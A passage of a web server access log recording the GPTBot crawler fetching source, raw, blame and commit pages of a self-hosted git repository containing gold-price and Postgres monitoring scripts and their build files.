+[17/Feb/2026:13:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17388] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12481] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12486] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20942] [Gzip 10.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20058] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20942] [Gzip 10.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12089] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10345] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12042] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11702] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9876] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9860] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9862] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20910] [Gzip 10.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9870] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12515] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 10836] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 11721] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 10835] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 11750] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 11749] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9463] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9461] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10901] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" +[17/Feb/2026:13:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" +[17/Feb/2026:13:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16594] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 10805] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 